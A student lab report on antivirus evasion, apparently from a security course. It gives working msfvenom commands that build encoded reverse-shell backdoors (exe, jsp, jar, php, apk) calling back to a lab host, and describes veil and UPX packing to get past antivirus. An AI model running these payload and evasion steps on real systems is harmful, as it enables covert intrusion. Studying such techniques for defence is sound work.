2019-2020-2 20175301 Lee Kum Ran "Network Countermeasures Technology" Exp3: AV Evasion Principles and Practice


Table of Contents

1. Experiment Tasks

(1) Task 1: Use the msf encoder correctly; use msfvenom to generate other file types such as jar; use veil-evasion; use shellcode programming techniques or other tools to achieve AV evasion.
(2) Task 2: Combine several techniques to achieve AV evasion of malicious code.
(3) Task 3: Test on another computer with antivirus software turned on and successfully get the backdoor to connect back; record the antivirus software name, its version and the computer name.

2. Basic Knowledge

2.1 Principles of AV evasion

AV evasion (anti-anti-virus technology, called "evasion" for short) refers to techniques that let Trojans and viruses escape detection by antivirus software. Because evasion covers a very wide range, including disassembly, reverse engineering, system vulnerabilities and other hacking techniques, it is quite difficult. Its content basically consists of modifying the signatures of viruses and Trojans so that the bytes the antivirus product matches on change, thereby evading detection.
To do a good job of evasion, you must first clearly understand how antivirus software (malware detection tools) works. AV (anti-virus) is a big industry.

3. Experiment Procedure

3.1 Correct use of the msf encoder

First look at the file generated in the last experiment, which was encoded only once:

(Screenshot: detection results from the VirusTotal website)
Enter the command
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.198.128 LPORT=5301 -f exe > encoded10.exe
to generate a program encoded 10 times (-i 10).

I tried several different numbers of encoding iterations; it makes little difference, the AV still detects it, especially my Huorong, which flagged it several times.
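The following is an added example, not part of the original lab report, that puts the point of sections 2.1 and 3.1 into code: a toy substring-based signature scanner, and a toy additive-feedback XOR encoder standing in for shikata_ga_nai. The payload bytes, the signature database and the decoder stub bytes are all constructed for the demonstration (they are not real shellcode), and the encoder is a simplified model, not the real x86/shikata_ga_nai. It shows that encoding changes the body bytes, so a signature on the body no longer matches the single-layer output, while every encoding layer prepends a decoder stub whose fixed prologue is just as signable, which is one reason ten iterations of the same encoder still get caught.

```python
# Added example (not from the original lab report): a toy signature scanner and a
# toy additive-feedback XOR encoder, to show what "-e x86/shikata_ga_nai -i 10"
# does and does not change from a signature scanner's point of view.
# All byte strings are constructed for illustration; nothing here is real shellcode.

# Stand-in for an unencoded shellcode body (constructed sample, not a real payload).
PAYLOAD = bytes.fromhex("fce8820000006089e531c0648b50308b520c8b52148b72280fb74a26")

# Constructed decoder stub: a fixed prologue, one byte of key, a fixed epilogue.
# In a real encoder the prologue is machine code; here it is just signable bytes.
STUB_PROLOGUE = b"\xeb\x0e\x5e\x31\xc9"
STUB_EPILOGUE = b"\x80\x36"

# Constructed "virus database": name -> byte pattern matched as a substring.
SIGNATURES = {
    "payload_body": PAYLOAD[:8],        # a signature written on the unencoded body
    "toy_decoder_stub": STUB_PROLOGUE,  # a signature written on the decoder stub
}


def scan(blob):
    """Return the names of every signature found in blob (plain substring match)."""
    return [name for name, sig in SIGNATURES.items() if sig in blob]


def toy_encode(body, key):
    """Additive-feedback XOR, a simplified model of the shikata_ga_nai idea:
    each byte is XORed with a running key that is then updated with the output byte,
    so a different key gives a completely different byte stream."""
    out = bytearray()
    k = key
    for b in body:
        c = b ^ k
        out.append(c)
        k = (k + c) & 0xFF
    return bytes(out)


def toy_decode(enc, key):
    """Inverse of toy_encode; this is what the decoder stub does at run time."""
    out = bytearray()
    k = key
    for c in enc:
        out.append(c ^ k)
        k = (k + c) & 0xFF
    return bytes(out)


def build_sample(body, key, iterations=1):
    """Emulate `msfvenom -e ... -i N`: encode the current blob N times, each layer
    with its own key, prepending one decoder stub per layer (stub + key + encoded data)."""
    blob = body
    k = key
    for _ in range(iterations):
        blob = STUB_PROLOGUE + bytes([k]) + STUB_EPILOGUE + toy_encode(blob, k)
        k = (k * 7 + 13) & 0xFF  # derive the next layer's key (arbitrary choice)
    return blob


def decode_sample(blob, iterations):
    """Peel the layers off again to show the original body is fully recoverable."""
    for _ in range(iterations):
        if not blob.startswith(STUB_PROLOGUE):
            raise ValueError("missing decoder stub")
        key = blob[len(STUB_PROLOGUE)]
        blob = toy_decode(blob[len(STUB_PROLOGUE) + 1 + len(STUB_EPILOGUE):], key)
    return blob


if __name__ == "__main__":
    print("raw payload hits:      ", scan(PAYLOAD))
    print("1 encoding layer hits: ", scan(build_sample(PAYLOAD, 0x41, 1)))
    print("10 encoding layer hits:", scan(build_sample(PAYLOAD, 0x41, 10)))
```

The real shikata_ga_nai also shuffles the decoder's instruction order and register choice, but the decoder's structure stays recognizable, and modern antivirus engines additionally emulate the stub to recover the body, so more encoder iterations mainly help against the crudest byte-pattern matching.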

3.2 Generating a jsp file with msfvenom

Use msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.198.128 LPORT=5301 -f raw > 20175301jsp.jsp to generate the jsp file.

Huorong did not detect it.

3.3 Generating a jar file with msfvenom

Use msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 -f jar > 20175301jar.jar to generate the jar file.

Huorong again did not detect it.

3.4 Generating a php file with msfvenom

Use msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 -f raw > 20175301php.php to generate the php file.

Huorong still did not react.

3.5 Generating an apk (Android) file with msfvenom

Use msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=5301 -f raw > 20175301apk.apk to generate the apk file.

It looks like Huorong really is useless here.

3.6 Using veil-evasion to generate a backdoor

Downloading veil was a really tortuous process. I read many different blogs and in the end found that wine was missing,
and it could not be installed with sudo apt-get install wine.
In the end I used the method from https://www.cnblogs.com/20175317zrw/p/12504140.html.
Actually, even when he was working on this, the installation was very, very slow.


And in the end it turned out that veil's hiding effect was barely better than useless.

3.7 Using the UPX packer


Seeing Huorong detect it, I had no confidence at all.

3.8 Combining several techniques to achieve evasion of malicious code

There is a known method that uses veil with a different payload, which can reach a 0 detection rate on VirusTotal.

The method comes from the blog https://www.cnblogs.com/20175317zrw/p/12504140.html

3.9 Test on another computer with antivirus software on, successfully connect back, and record the antivirus name and version and the computer name

Just packing it was enough.

4. Problems encountered in the experiment

The main problem was installing veil, which was serious. I did the experiment fairly late and could refer to other people's blogs, so the basic problems in the experiment were all resolved that way. I believe the path opened up by those who went first is a convenient way for those who come after.

5. Questions answered

1) How does antivirus software detect malicious code?
Based on signatures (searching the virus database), and behaviour-based detection (observing behavioural characteristics).
2) What is evasion?
Evading antivirus software.
3) What are the basic methods of evasion?
Change the signature, do not reuse other people's viruses (do not copy them), and change the behavioural characteristics.
4) Can turning on antivirus software absolutely prevent malicious code on the computer?
No, I just did it.

Source: www.cnblogs.com/lijinran/p/12629126.html